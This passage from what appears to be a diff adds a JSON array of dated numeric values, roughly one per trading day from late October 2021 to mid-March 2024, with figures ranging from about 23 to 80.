64.11796670119224 + ], + [ + "2021-10-28", + 68.02978777772829 + ], + [ + "2021-10-29", + 69.62684352344485 + ], + [ + "2021-11-01", + 70.72672756723438 + ], + [ + "2021-11-02", + 72.06380143970219 + ], + [ + "2021-11-03", + 75.17669548961761 + ], + [ + "2021-11-04", + 78.3474667288033 + ], + [ + "2021-11-05", + 78.5696939664484 + ], + [ + "2021-11-08", + 77.35440001390218 + ], + [ + "2021-11-09", + 71.32646046346366 + ], + [ + "2021-11-10", + 60.551244125884445 + ], + [ + "2021-11-11", + 61.70926616999927 + ], + [ + "2021-11-12", + 65.82106689208175 + ], + [ + "2021-11-15", + 65.65477217920522 + ], + [ + "2021-11-16", + 68.34345977498612 + ], + [ + "2021-11-17", + 68.54157256607814 + ], + [ + "2021-11-18", + 72.21687545039286 + ], + [ + "2021-11-19", + 73.99562235218778 + ], + [ + "2021-11-22", + 64.66104176105483 + ], + [ + "2021-11-23", + 61.42268637296823 + ], + [ + "2021-11-24", + 62.83259309997798 + ], + [ + "2021-11-26", + 50.9821400680284 + ], + [ + "2021-11-29", + 60.0862788437757 + ], + [ + "2021-11-30", + 52.786263499662866 + ], + [ + "2021-12-01", + 45.92757840462744 + ], + [ + "2021-12-02", + 48.90483089617499 + ], + [ + "2021-12-03", + 42.745529018498694 + ], + [ + "2021-12-06", + 46.05825308109332 + ], + [ + "2021-12-07", + 56.359991184518975 + ], + [ + "2021-12-08", + 57.69168429905404 + ], + [ + "2021-12-09", + 52.041786293137136 + ], + [ + "2021-12-10", + 55.460964119573944 + ], + [ + "2021-12-13", + 50.275127382061484 + ], + [ + "2021-12-14", + 46.93785589290723 + ], + [ + "2021-12-15", + 54.09161689122449 + ], + [ + "2021-12-16", + 46.3310446313148 + ], + [ + "2021-12-17", + 45.01626328071826 + ], + [ + "2021-12-20", + 42.50343576497416 + ], + [ + "2021-12-21", + 49.44693366426163 + ], + [ + "2021-12-22", + 52.857984487646554 + ], + [ + "2021-12-23", + 54.91085120324026 + ], + [ + "2021-12-27", + 59.142944721953725 + ], + [ + "2021-12-28", + 57.4865070997747 + ], + [ + "2021-12-29", + 57.43092029973047 + ], + [ + "2021-12-30", + 56.25943613063869 + ], + [ + "2021-12-31", + 53.79727921471488 + ], + [ + "2022-01-03", + 56.90855759500005 + ], + [ + "2022-01-04", + 51.7986041353217 + ], + [ + "2022-01-05", + 42.24772505115775 + ], + [ + "2022-01-06", + 42.062559314296664 + ], + [ + "2022-01-07", + 39.21129090016362 + ], + [ + "2022-01-10", + 39.47684684657483 + ], + [ + "2022-01-11", + 45.34844074835002 + ], + [ + "2022-01-12", + 46.83673538508349 + ], + [ + "2022-01-13", + 39.499993759216686 + ], + [ + "2022-01-14", + 41.877945006507105 + ], + [ + "2022-01-18", + 35.78122076179332 + ], + [ + "2022-01-19", + 33.520234552457865 + ], + [ + "2022-01-20", + 31.049063125860627 + ], + [ + "2022-01-21", + 26.599331887067052 + ], + [ + "2022-01-24", + 28.37393128306411 + ], + [ + "2022-01-25", + 25.05556741870062 + ], + [ + "2022-01-26", + 24.84925901344309 + ], + [ + "2022-01-27", + 23.509352099617317 + ], + [ + "2022-01-28", + 35.1254920086529 + ], + [ + "2022-01-31", + 44.64403705589501 + ], + [ + "2022-02-01", + 46.50002710042298 + ], + [ + "2022-02-02", + 48.72614122928374 + ], + [ + "2022-02-03", + 39.76306524076169 + ], + [ + "2022-02-04", + 43.12644407673849 + ], + [ + "2022-02-07", + 41.5145025318412 + ], + [ + "2022-02-08", + 44.6037456595048 + ], + [ + "2022-02-09", + 50.025646624245205 + ], + [ + "2022-02-10", + 44.867636088635415 + ], + [ + "2022-02-11", + 38.94385734496466 + ], + [ + "2022-02-14", + 39.27040978335331 + ], + [ + "2022-02-15", + 45.56982729330825 + ], + [ + "2022-02-16", + 45.516827566644395 + ], + [ + "2022-02-17", + 39.67374404624641 + ], + [ + "2022-02-18", + 37.73290324122747 + ], + [ + "2022-02-22", + 36.07825820295354 + ], + [ + "2022-02-23", + 32.23483889282262 + ], + [ + "2022-02-24", + 40.90172456911352 + ], + [ + "2022-02-25", + 44.54478416312568 + ], + [ + "2022-02-28", + 45.25376171668509 + ], + [ + "2022-03-01", + 42.25452487458501 + ], + [ + "2022-03-02", + 46.38404431337092 + ], + [ + "2022-03-03", + 43.485180431824396 + ], + [ + "2022-03-04", + 40.74299485202457 + ], + [ + "2022-03-07", + 34.8133315255498 + ], + [ + "2022-03-08", + 34.16342991506494 + ], + [ + "2022-03-09", + 42.99786621844782 + ], + [ + "2022-03-10", + 41.099720254489576 + ], + [ + "2022-03-11", + 37.78253246688016 + ], + [ + "2022-03-14", + 35.022084001006675 + ], + [ + "2022-03-15", + 42.29538522851595 + ], + [ + "2022-03-16", + 49.690873444279504 + ], + [ + "2022-03-17", + 51.93653155407596 + ], + [ + "2022-03-18", + 55.58969247385536 + ], + [ + "2022-03-21", + 54.96606563053017 + ], + [ + "2022-03-22", + 58.5004348856752 + ], + [ + "2022-03-23", + 55.0322090173197 + ], + [ + "2022-03-24", + 59.02042315865654 + ], + [ + "2022-03-25", + 58.8049610296236 + ], + [ + "2022-03-28", + 61.602819496181084 + ], + [ + "2022-03-29", + 64.53289110116637 + ], + [ + "2022-03-30", + 61.246896727142804 + ], + [ + "2022-03-31", + 57.733443360697436 + ], + [ + "2022-04-01", + 57.197676039247 + ], + [ + "2022-04-04", + 61.366984221357285 + ], + [ + "2022-04-05", + 55.014803301382464 + ], + [ + "2022-04-06", + 49.716063221457325 + ], + [ + "2022-04-07", + 50.2687739107383 + ], + [ + "2022-04-08", + 46.991092191118845 + ], + [ + "2022-04-11", + 42.06253985844652 + ], + [ + "2022-04-12", + 41.25023566395148 + ], + [ + "2022-04-13", + 46.57411442994896 + ], + [ + "2022-04-14", + 41.882591807877944 + ], + [ + "2022-04-18", + 42.08881965734098 + ], + [ + "2022-04-19", + 47.88725829825506 + ], + [ + "2022-04-20", + 44.67374684833129 + ], + [ + "2022-04-21", + 40.57444151178154 + ], + [ + "2022-04-22", + 36.147281588597615 + ], + [ + "2022-04-25", + 39.54109262271273 + ], + [ + "2022-04-26", + 33.78579150623527 + ], + [ + "2022-04-27", + 33.62479839035849 + ], + [ + "2022-04-28", + 42.37912906235849 + ], + [ + "2022-04-29", + 35.722174317738904 + ], + [ + "2022-05-02", + 39.35715126986258 + ], + [ + "2022-05-03", + 39.59633341411177 + ], + [ + "2022-05-04", + 46.76456745753685 + ], + [ + "2022-05-05", + 39.074687219134255 + ], + [ + "2022-05-06", + 37.571654896635714 + ], + [ + "2022-05-09", + 33.14179124531174 + ], + [ + "2022-05-10", + 35.58205894009416 + ], + [ + "2022-05-11", + 32.432117802694805 + ], + [ + "2022-05-12", + 32.194675365139986 + ], + [ + "2022-05-13", + 39.63660053941135 + ], + [ + "2022-05-16", + 38.17302300089359 + ], + [ + "2022-05-17", + 43.16447208719871 + ], + [ + "2022-05-18", + 36.9227304911634 + ], + [ + "2022-05-19", + 36.335430819867554 + ], + [ + "2022-05-20", + 35.97983585681364 + ], + [ + "2022-05-23", + 39.386693751594606 + ], + [ + "2022-05-24", + 36.655799296664 + ], + [ + "2022-05-25", + 39.56308611837464 + ], + [ + "2022-05-26", + 45.01845521308022 + ], + [ + "2022-05-27", + 50.80772972492503 + ], + [ + "2022-05-31", + 50.3287397557747 + ], + [ + "2022-06-01", + 48.947007798985446 + ], + [ + "2022-06-02", + 53.95111535763767 + ], + [ + "2022-06-03", + 48.91137618748208 + ], + [ + "2022-06-06", + 49.54425400280699 + ], + [ + "2022-06-07", + 51.23463348619838 + ], + [ + "2022-06-08", + 49.724930134180916 + ], + [ + "2022-06-09", + 44.50648323439435 + ], + [ + "2022-06-10", + 38.87567747360507 + ], + [ + "2022-06-13", + 33.13425635703523 + ], + [ + "2022-06-14", + 33.52784372353055 + ], + [ + "2022-06-15", + 38.868076039286045 + ], + [ + "2022-06-16", + 33.997159565669705 + ], + [ + "2022-06-17", + 36.47663163008422 + ], + [ + "2022-06-21", + 41.45108445976924 + ], + [ + "2022-06-22", + 41.244962112213535 + ], + [ + "2022-06-23", + 44.287339310990134 + ], + [ + "2022-06-24", + 50.705894300966875 + ], + [ + "2022-06-27", + 49.350788875507234 + ], + [ + "2022-06-28", + 44.11375168417185 + ], + [ + "2022-06-29", + 44.29951887471856 + ], + [ + "2022-06-30", + 42.25197306881469 + ], + [ + "2022-07-01", + 43.724155931270985 + ], + [ + "2022-07-05", + 47.488115659924595 + ], + [ + "2022-07-06", + 48.89058138812849 + ], + [ + "2022-07-07", + 53.392872931514326 + ], + [ + "2022-07-08", + 53.65607811358624 + ], + [ + "2022-07-11", + 48.61364557304016 + ], + [ + "2022-07-12", + 46.524257556878915 + ], + [ + "2022-07-13", + 46.07490654624855 + ], + [ + "2022-07-14", + 47.02751559979407 + ], + [ + "2022-07-15", + 51.71077164958563 + ], + [ + "2022-07-18", + 49.47336274382071 + ], + [ + "2022-07-19", + 56.7371592275237 + ], + [ + "2022-07-20", + 60.02616361852327 + ], + [ + "2022-07-21", + 62.82530098939176 + ], + [ + "2022-07-22", + 57.4566160332535 + ], + [ + "2022-07-25", + 55.81738449827088 + ], + [ + "2022-07-26", + 50.49568301009237 + ], + [ + "2022-07-27", + 59.305542109238964 + ], + [ + "2022-07-28", + 61.10325320792668 + ], + [ + "2022-07-29", + 64.30175647181073 + ], + [ + "2022-08-01", + 64.11078663763963 + ], + [ + "2022-08-02", + 63.112488023386895 + ], + [ + "2022-08-03", + 67.99965793336116 + ], + [ + "2022-08-04", + 68.78528119940034 + ], + [ + "2022-08-05", + 65.73511775472235 + ], + [ + "2022-08-08", + 64.52579650906193 + ], + [ + "2022-08-09", + 60.352398814157326 + ], + [ + "2022-08-10", + 66.1078285333157 + ], + [ + "2022-08-11", + 64.01579721735214 + ], + [ + "2022-08-12", + 67.76298450946044 + ], + [ + "2022-08-15", + 69.2234187738537 + ], + [ + "2022-08-16", + 68.25063704759695 + ], + [ + "2022-08-17", + 63.57586092267359 + ], + [ + "2022-08-18", + 64.12742092294661 + ], + [ + "2022-08-19", + 56.62334244390238 + ], + [ + "2022-08-22", + 48.52678887781354 + ], + [ + "2022-08-23", + 48.29932353894997 + ], + [ + "2022-08-24", + 49.197001325069465 + ], + [ + "2022-08-25", + 54.414696942765815 + ], + [ + "2022-08-26", + 43.15471323619508 + ], + [ + "2022-08-29", + 41.04551082376912 + ], + [ + "2022-08-30", + 38.76279261596359 + ], + [ + "2022-08-31", + 37.60027664403001 + ], + [ + "2022-09-01", + 37.74967651288684 + ], + [ + "2022-09-02", + 34.82862443873323 + ], + [ + "2022-09-06", + 33.432304435165065 + ], + [ + "2022-09-07", + 40.59442098868846 + ], + [ + "2022-09-08", + 42.34351375039499 + ], + [ + "2022-09-09", + 49.174629872770396 + ], + [ + "2022-09-12", + 52.538927877064324 + ], + [ + "2022-09-13", + 39.420188869316966 + ], + [ + "2022-09-14", + 41.56860507258168 + ], + [ + "2022-09-15", + 38.46054633853553 + ], + [ + "2022-09-16", + 37.373944596527025 + ], + [ + "2022-09-19", + 39.696290963592354 + ], + [ + "2022-09-20", + 38.12570726771966 + ], + [ + "2022-09-21", + 34.81953150893416 + ], + [ + "2022-09-22", + 32.754667266617346 + ], + [ + "2022-09-23", + 30.231967318779837 + ], + [ + "2022-09-26", + 29.617810944284344 + ], + [ + "2022-09-27", + 29.766123347058624 + ], + [ + "2022-09-28", + 36.874215670509784 + ], + [ + "2022-09-29", + 31.75827520410273 + ], + [ + "2022-09-30", + 29.260752936310624 + ], + [ + "2022-10-03", + 36.56731501650342 + ], + [ + "2022-10-04", + 44.96397292721267 + ], + [ + "2022-10-05", + 44.85248651516636 + ], + [ + "2022-10-06", + 43.14680665929445 + ], + [ + "2022-10-07", + 36.05631546512657 + ], + [ + "2022-10-10", + 34.514940797204986 + ], + [ + "2022-10-11", + 32.480384580980314 + ], + [ + "2022-10-12", + 32.429767080493505 + ], + [ + "2022-10-13", + 39.392473429018345 + ], + [ + "2022-10-14", + 34.38711202990932 + ], + [ + "2022-10-17", + 42.73685911269731 + ], + [ + "2022-10-18", + 44.6146494521135 + ], + [ + "2022-10-19", + 43.89413359629969 + ], + [ + "2022-10-20", + 42.85527578978596 + ], + [ + "2022-10-21", + 48.820144638646084 + ], + [ + "2022-10-24", + 51.441163939043214 + ], + [ + "2022-10-25", + 56.04922484610232 + ], + [ + "2022-10-26", + 50.43017354034932 + ], + [ + "2022-10-27", + 46.394378400406495 + ], + [ + "2022-10-28", + 53.06894599462299 + ], + [ + "2022-10-31", + 50.42120789013268 + ], + [ + "2022-11-01", + 48.17320349819464 + ], + [ + "2022-11-02", + 41.54924870838074 + ], + [ + "2022-11-03", + 38.41822760856764 + ], + [ + "2022-11-04", + 42.20476936015601 + ], + [ + "2022-11-07", + 44.74593712401305 + ], + [ + "2022-11-08", + 46.445193338449016 + ], + [ + "2022-11-09", + 42.007416637514254 + ], + [ + "2022-11-10", + 56.11380835499619 + ], + [ + "2022-11-11", + 58.99416220633765 + ], + [ + "2022-11-14", + 57.0440141856922 + ], + [ + "2022-11-15", + 59.314331590704235 + ], + [ + "2022-11-16", + 56.120102731997704 + ], + [ + "2022-11-17", + 55.605770586062526 + ], + [ + "2022-11-18", + 55.61268765441401 + ], + [ + "2022-11-21", + 52.99343303434411 + ], + [ + "2022-11-22", + 56.080265791233195 + ], + [ + "2022-11-23", + 58.171334521436904 + ], + [ + "2022-11-25", + 56.26160475602437 + ], + [ + "2022-11-28", + 52.17424507251297 + ], + [ + "2022-11-29", + 50.17877529656623 + ], + [ + "2022-11-30", + 60.02065843579145 + ], + [ + "2022-12-01", + 60.25866550411028 + ], + [ + "2022-12-02", + 59.02887317044456 + ], + [ + "2022-12-05", + 54.04424367619495 + ], + [ + "2022-12-06", + 48.671559243362 + ], + [ + "2022-12-07", + 47.686465952019915 + ], + [ + "2022-12-08", + 50.783367005025696 + ], + [ + "2022-12-09", + 49.07756201691776 + ], + [ + "2022-12-12", + 52.44233254848701 + ], + [ + "2022-12-13", + 55.20645712562851 + ], + [ + "2022-12-14", + 52.898376095226816 + ], + [ + "2022-12-15", + 43.9940683148413 + ], + [ + "2022-12-16", + 41.909215304063785 + ], + [ + "2022-12-19", + 39.00319708076741 + ], + [ + "2022-12-20", + 38.84476684244021 + ], + [ + "2022-12-21", + 43.450557834133896 + ], + [ + "2022-12-22", + 38.15560700890498 + ], + [ + "2022-12-23", + 38.87496128454045 + ], + [ + "2022-12-27", + 36.031175279965616 + ], + [ + "2022-12-28", + 33.59467677965684 + ], + [ + "2022-12-29", + 41.37304288489102 + ], + [ + "2022-12-30", + 41.24171524972162 + ], + [ + "2023-01-03", + 39.71485462962136 + ], + [ + "2023-01-04", + 41.351604199643866 + ], + [ + "2023-01-05", + 37.71102989292675 + ], + [ + "2023-01-06", + 46.51263859019592 + ], + [ + "2023-01-09", + 48.40482154345478 + ], + [ + "2023-01-10", + 50.868142839716086 + ], + [ + "2023-01-11", + 55.57616036512596 + ], + [ + "2023-01-12", + 56.98678644023755 + ], + [ + "2023-01-13", + 58.79061190685158 + ], + [ + "2023-01-17", + 59.33584100138596 + ], + [ + "2023-01-18", + 54.3624624026 + ], + [ + "2023-01-19", + 50.933222085903104 + ], + [ + "2023-01-20", + 58.676298872758274 + ], + [ + "2023-01-23", + 63.80618204881444 + ], + [ + "2023-01-24", + 63.01471323850441 + ], + [ + "2023-01-25", + 62.114699578907285 + ], + [ + "2023-01-26", + 66.61596588269528 + ], + [ + "2023-01-27", + 68.70055139413213 + ], + [ + "2023-01-30", + 60.37249369551497 + ], + [ + "2023-01-31", + 63.80404685626087 + ], + [ + "2023-02-01", + 68.11093519818566 + ], + [ + "2023-02-02", + 73.85436582584414 + ], + [ + "2023-02-03", + 67.17120374928832 + ], + [ + "2023-02-06", + 64.24424199745658 + ], + [ + "2023-02-07", + 67.90222473292923 + ], + [ + "2023-02-08", + 61.92563814008648 + ], + [ + "2023-02-09", + 59.18673467963746 + ], + [ + "2023-02-10", + 57.182025110468054 + ], + [ + "2023-02-13", + 60.660753992580446 + ], + [ + "2023-02-14", + 62.210657231095475 + ], + [ + "2023-02-15", + 63.81420660732559 + ], + [ + "2023-02-16", + 57.34636804444889 + ], + [ + "2023-02-17", + 55.126194378269666 + ], + [ + "2023-02-21", + 48.40266709429427 + ], + [ + "2023-02-22", + 48.61092678249726 + ], + [ + "2023-02-23", + 51.09442554078353 + ], + [ + "2023-02-24", + 46.422246474267034 + ], + [ + "2023-02-27", + 48.55269660176432 + ], + [ + "2023-02-28", + 48.17764051993156 + ], + [ + "2023-03-01", + 45.810452047033884 + ], + [ + "2023-03-02", + 48.58843855353665 + ], + [ + "2023-03-03", + 54.86464941796546 + ], + [ + "2023-03-06", + 55.1944992713495 + ], + [ + "2023-03-07", + 50.86093761497518 + ], + [ + "2023-03-08", + 52.476997278962195 + ], + [ + "2023-03-09", + 46.70908345630628 + ], + [ + "2023-03-10", + 42.68475855322763 + ], + [ + "2023-03-13", + 45.326121794705834 + ], + [ + "2023-03-14", + 52.65999105294321 + ], + [ + "2023-03-15", + 54.20489088297322 + ], + [ + "2023-03-16", + 61.109095221942596 + ], + [ + "2023-03-17", + 59.33635434427318 + ], + [ + "2023-03-20", + 60.26413143080221 + ], + [ + "2023-03-21", + 63.85130531581287 + ], + [ + "2023-03-22", + 58.371311998889055 + ], + [ + "2023-03-23", + 61.43725187131861 + ], + [ + "2023-03-24", + 62.37448023163724 + ], + [ + "2023-03-27", + 59.466402264270386 + ], + [ + "2023-03-28", + 57.25308437192617 + ], + [ + "2023-03-29", + 62.399395057604025 + ], + [ + "2023-03-30", + 64.81087383876917 + ], + [ + "2023-03-31", + 68.65120574681796 + ], + [ + "2023-04-03", + 67.47297229642757 + ], + [ + "2023-04-04", + 65.78939623770364 + ], + [ + "2023-04-05", + 61.007988966107696 + ], + [ + "2023-04-06", + 62.967847333630175 + ], + [ + "2023-04-10", + 62.68113970701629 + ], + [ + "2023-04-11", + 59.38095263124246 + ], + [ + "2023-04-12", + 55.10758997554812 + ], + [ + "2023-04-13", + 61.63968183340203 + ], + [ + "2023-04-14", + 60.70847542793994 + ], + [ + "2023-04-17", + 60.99401353296942 + ], + [ + "2023-04-18", + 61.01661546712972 + ], + [ + "2023-04-19", + 60.73249563799421 + ], + [ + "2023-04-20", + 56.16809421454759 + ], + [ + "2023-04-21", + 56.64458608532958 + ], + [ + "2023-04-24", + 55.348521272530796 + ], + [ + "2023-04-25", + 45.27442423415121 + ], + [ + "2023-04-26", + 48.461154931384904 + ], + [ + "2023-04-27", + 59.82491096516489 + ], + [ + "2023-04-28", + 62.16609684970614 + ], + [ + "2023-05-01", + 61.51969022539106 + ], + [ + "2023-05-02", + 56.69796761477246 + ], + [ + "2023-05-03", + 53.348810677078596 + ], + [ + "2023-05-04", + 51.5901730093961 + ], + [ + "2023-05-05", + 60.09118205746345 + ], + [ + "2023-05-08", + 60.96990981421818 + ], + [ + "2023-05-09", + 57.47754267570553 + ], + [ + "2023-05-10", + 61.529245439312426 + ], + [ + "2023-05-11", + 62.688751444833706 + ], + [ + "2023-05-12", + 60.52042213358286 + ], + [ + "2023-05-15", + 62.61527211682157 + ], + [ + "2023-05-16", + 63.058922521211784 + ], + [ + "2023-05-17", + 67.50475402947964 + ], + [ + "2023-05-18", + 72.94947013682886 + ], + [ + "2023-05-19", + 71.35830264811514 + ], + [ + "2023-05-22", + 72.324986306135 + ], + [ + "2023-05-23", + 63.5734720776719 + ], + [ + "2023-05-24", + 60.42755049231277 + ], + [ + "2023-05-25", + 68.38005706631736 + ], + [ + "2023-05-26", + 74.35062060212326 + ], + [ + "2023-05-30", + 75.26613981200924 + ], + [ + "2023-05-31", + 71.79050972907997 + ], + [ + "2023-06-01", + 74.36574058468065 + ], + [ + "2023-06-02", + 75.92036643838433 + ], + [ + "2023-06-05", + 76.06837783351943 + ], + [ + "2023-06-06", + 75.94770491650931 + ], + [ + "2023-06-07", + 64.83552379014215 + ], + [ + "2023-06-08", + 68.41518295937328 + ], + [ + "2023-06-09", + 69.45905512921526 + ], + [ + "2023-06-12", + 73.62444345926912 + ], + [ + "2023-06-13", + 75.30196153825221 + ], + [ + "2023-06-14", + 76.81543915938602 + ], + [ + "2023-06-15", + 79.09402909696561 + ], + [ + "2023-06-16", + 74.85992789332106 + ], + [ + "2023-06-20", + 73.896859413129 + ], + [ + "2023-06-21", + 65.29757381664413 + ], + [ + "2023-06-22", + 68.65250628108085 + ], + [ + "2023-06-23", + 63.0701333908148 + ], + [ + "2023-06-26", + 56.451750387252545 + ], + [ + "2023-06-27", + 61.90016557473242 + ], + [ + "2023-06-28", + 62.48375336045847 + ], + [ + "2023-06-29", + 61.441680124553265 + ], + [ + "2023-06-30", + 66.1180764513902 + ], + [ + "2023-07-03", + 66.79068315064546 + ], + [ + "2023-07-05", + 66.77429457932314 + ], + [ + "2023-07-06", + 62.13795555557492 + ], + [ + "2023-07-07", + 60.19091770909019 + ], + [ + "2023-07-10", + 60.322550160076425 + ], + [ + "2023-07-11", + 62.34611174329139 + ], + [ + "2023-07-12", + 67.0019024318824 + ], + [ + "2023-07-13", + 72.06544453360533 + ], + [ + "2023-07-14", + 71.91537947862865 + ], + [ + "2023-07-17", + 74.45269931041645 + ], + [ + "2023-07-18", + 76.47636926541416 + ], + [ + "2023-07-19", + 76.28928416760866 + ], + [ + "2023-07-20", + 60.533048395027734 + ], + [ + "2023-07-21", + 58.86875294350579 + ], + [ + "2023-07-24", + 59.50540961667576 + ], + [ + "2023-07-25", + 62.18440155404531 + ], + [ + "2023-07-26", + 60.06971373184749 + ], + [ + "2023-07-27", + 58.53836236644379 + ], + [ + "2023-07-28", + 65.71302796482797 + ], + [ + "2023-07-31", + 65.89826932028382 + ], + [ + "2023-08-01", + 64.2348653185418 + ], + [ + "2023-08-02", + 51.11924342051281 + ], + [ + "2023-08-03", + 50.32870578317773 + ], + [ + "2023-08-04", + 47.9974072598372 + ], + [ + "2023-08-07", + 52.28204669202921 + ], + [ + "2023-08-08", + 47.97151660319966 + ], + [ + "2023-08-09", + 43.06838667893126 + ], + [ + "2023-08-10", + 44.09156690738811 + ], + [ + "2023-08-11", + 41.327414068049 + ], + [ + "2023-08-14", + 47.52363363242188 + ], + [ + "2023-08-15", + 42.86242792458669 + ], + [ + "2023-08-16", + 38.81466221327696 + ], + [ + "2023-08-17", + 35.16466745472337 + ], + [ + "2023-08-18", + 34.7646120147151 + ], + [ + "2023-08-21", + 43.62169073901371 + ], + [ + "2023-08-22", + 43.054307817462075 + ], + [ + "2023-08-23", + 50.66796098989136 + ], + [ + "2023-08-24", + 42.2845244992104 + ], + [ + "2023-08-25", + 45.71709334060606 + ], + [ + "2023-08-28", + 48.91866896198211 + ], + [ + "2023-08-29", + 56.91816272972104 + ], + [ + "2023-08-30", + 58.73411926135737 + ], + [ + "2023-08-31", + 59.72263196655176 + ], + [ + "2023-09-01", + 59.18213422735013 + ], + [ + "2023-09-05", + 59.653954877465885 + ], + [ + "2023-09-06", + 54.911868817831525 + ], + [ + "2023-09-07", + 51.37236209108002 + ], + [ + "2023-09-08", + 52.01859459248024 + ], + [ + "2023-09-11", + 57.19099213640806 + ], + [ + "2023-09-12", + 51.49842790979573 + ], + [ + "2023-09-13", + 53.20248156855703 + ], + [ + "2023-09-14", + 56.73071398283563 + ], + [ + "2023-09-15", + 48.42970194675755 + ], + [ + "2023-09-18", + 48.91139233216411 + ], + [ + "2023-09-19", + 47.92473277239149 + ], + [ + "2023-09-20", + 41.79809938014832 + ], + [ + "2023-09-21", + 35.64739490366867 + ], + [ + "2023-09-22", + 35.7237604696504 + ], + [ + "2023-09-25", + 38.39605382856523 + ], + [ + "2023-09-26", + 33.61511788964246 + ], + [ + "2023-09-27", + 34.9556503768201 + ], + [ + "2023-09-28", + 39.652141909243056 + ], + [ + "2023-09-29", + 40.060112184048755 + ], + [ + "2023-10-02", + 44.691253053839084 + ], + [ + "2023-10-03", + 37.988918616491205 + ], + [ + "2023-10-04", + 44.782803742051705 + ], + [ + "2023-10-05", + 43.652471634644066 + ], + [ + "2023-10-06", + 51.176922470059445 + ], + [ + "2023-10-09", + 53.25722916631747 + ], + [ + "2023-10-10", + 55.48650090126187 + ], + [ + "2023-10-11", + 58.263781609227806 + ], + [ + "2023-10-12", + 56.40484227027139 + ], + [ + "2023-10-13", + 50.188814622944804 + ], + [ + "2023-10-16", + 54.93870945795311 + ], + [ + "2023-10-17", + 53.33410816664562 + ], + [ + "2023-10-18", + 47.38457501349909 + ], + [ + "2023-10-19", + 43.68983744964796 + ], + [ + "2023-10-20", + 38.57405178870269 + ], + [ + "2023-10-23", + 40.07959307902493 + ], + [ + "2023-10-24", + 44.79189754310667 + ], + [ + "2023-10-25", + 36.86101755729465 + ], + [ + "2023-10-26", + 32.19557789326879 + ], + [ + "2023-10-27", + 34.404183060332144 + ], + [ + "2023-10-30", + 39.41424576944975 + ], + [ + "2023-10-31", + 41.48069589697909 + ], + [ + "2023-11-01", + 48.39344063114026 + ], + [ + "2023-11-02", + 54.546092842317385 + ], + [ + "2023-11-03", + 58.09175041735141 + ], + [ + "2023-11-06", + 59.29303191624193 + ], + [ + "2023-11-07", + 62.02081186336165 + ], + [ + "2023-11-08", + 62.20835475595592 + ], + [ + "2023-11-09", + 58.488868923564226 + ], + [ + "2023-11-10", + 65.0186557458826 + ], + [ + "2023-11-13", + 63.49311858748467 + ], + [ + "2023-11-14", + 68.90045505219518 + ], + [ + "2023-11-15", + 69.07663047044902 + ], + [ + "2023-11-16", + 69.28979257402557 + ], + [ + "2023-11-17", + 69.3518288727721 + ], + [ + "2023-11-20", + 72.47931465466112 + ], + [ + "2023-11-21", + 68.82629503540399 + ], + [ + "2023-11-22", + 69.96808952643568 + ], + [ + "2023-11-24", + 69.02619525138385 + ], + [ + "2023-11-27", + 68.41318555961163 + ], + [ + "2023-11-28", + 69.29427157879195 + ], + [ + "2023-11-29", + 68.52727032832821 + ], + [ + "2023-11-30", + 66.48379468416766 + ], + [ + "2023-12-01", + 67.66017090505466 + ], + [ + "2023-12-04", + 60.235084377544766 + ], + [ + "2023-12-05", + 61.45565764291583 + ], + [ + "2023-12-06", + 57.09691206458106 + ], + [ + "2023-12-07", + 63.747404596364916 + ], + [ + "2023-12-08", + 65.60442696946097 + ], + [ + "2023-12-11", + 68.90671236348734 + ], + [ + "2023-12-12", + 71.66185617705504 + ], + [ + "2023-12-13", + 75.43480084862398 + ], + [ + "2023-12-14", + 74.69550553243603 + ], + [ + "2023-12-15", + 76.10088036249985 + ], + [ + "2023-12-18", + 77.83656226063725 + ], + [ + "2023-12-19", + 79.16664157684808 + ], + [ + "2023-12-20", + 66.58710071302474 + ], + [ + "2023-12-21", + 70.4833583893777 + ], + [ + "2023-12-22", + 70.95766888671659 + ], + [ + "2023-12-26", + 72.8812212029536 + ], + [ + "2023-12-27", + 73.51329306864545 + ], + [ + "2023-12-28", + 73.07453522735543 + ], + [ + "2023-12-29", + 69.11989589235235 + ], + [ + "2024-01-02", + 56.33737176281377 + ], + [ + "2024-01-03", + 50.19238212768665 + ], + [ + "2024-01-04", + 47.50706407620317 + ], + [ + "2024-01-05", + 48.19138100853434 + ], + [ + "2024-01-08", + 58.38546497635295 + ], + [ + "2024-01-09", + 59.22832788291705 + ], + [ + "2024-01-10", + 62.07214790716493 + ], + [ + "2024-01-11", + 62.93273255009611 + ], + [ + "2024-01-12", + 63.155186235079974 + ], + [ + "2024-01-16", + 63.07740651773787 + ], + [ + "2024-01-17", + 58.59700952044971 + ], + [ + "2024-01-18", + 65.24856578747817 + ], + [ + "2024-01-19", + 72.0905650519369 + ], + [ + "2024-01-22", + 72.48235840292773 + ], + [ + "2024-01-23", + 73.74538401113979 + ], + [ + "2024-01-24", + 75.37951981757422 + ], + [ + "2024-01-25", + 75.73940613084332 + ], + [ + "2024-01-26", + 70.33197293627708 + ], + [ + "2024-01-29", + 73.77694516256147 + ], + [ + "2024-01-30", + 68.17829910048775 + ], + [ + "2024-01-31", + 55.03291596318424 + ], + [ + "2024-02-01", + 59.93637017161218 + ], + [ + "2024-02-02", + 65.77299965955511 + ], + [ + "2024-02-05", + 64.97245956914995 + ], + [ + "2024-02-06", + 63.69017684578462 + ], + [ + "2024-02-07", + 67.25100556536115 + ], + [ + "2024-02-08", + 67.86807136288316 + ], + [ + "2024-02-09", + 71.0011328371715 + ], + [ + "2024-02-12", + 68.12941975632826 + ], + [ + "2024-02-13", + 58.08353788687847 + ], + [ + "2024-02-14", + 62.21073195267623 + ], + [ + "2024-02-15", + 63.28609725825088 + ], + [ + "2024-02-16", + 57.869471478484016 + ], + [ + "2024-02-20", + 53.780413876981555 + ], + [ + "2024-02-21", + 51.710013479926005 + ], + [ + "2024-02-22", + 62.91331061628236 + ], + [ + "2024-02-23", + 61.32688261331854 + ], + [ + "2024-02-26", + 61.03144049650358 + ], + [ + "2024-02-27", + 61.9331357246636 + ], + [ + "2024-02-28", + 58.68785666039958 + ], + [ + "2024-02-29", + 62.11073085225069 + ], + [ + "2024-03-01", + 67.28373231076804 + ], + [ + "2024-03-04", + 64.9853697611839 + ], + [ + "2024-03-05", + 54.8677316576145 + ], + [ + "2024-03-06", + 57.32748475104745 + ], + [ + "2024-03-07", + 62.65520187639255 + ], + [ + "2024-03-08", + 55.4562867988755 + ], + [ + "2024-03-11", + 53.76973231518591 + ], + [ + "2024-03-12", + 58.94237725524445 + ], + [ + "2024-03-13", + 55.317211001342784 + ], + [ + "2024-03-14", + 54.14984033992267 + ], + [ + "2024-03-15", + 48.92092781224905 + ], + [ + "2024-03-18", + 52.811435857912755 + ], + [ + "2024-03-19", + 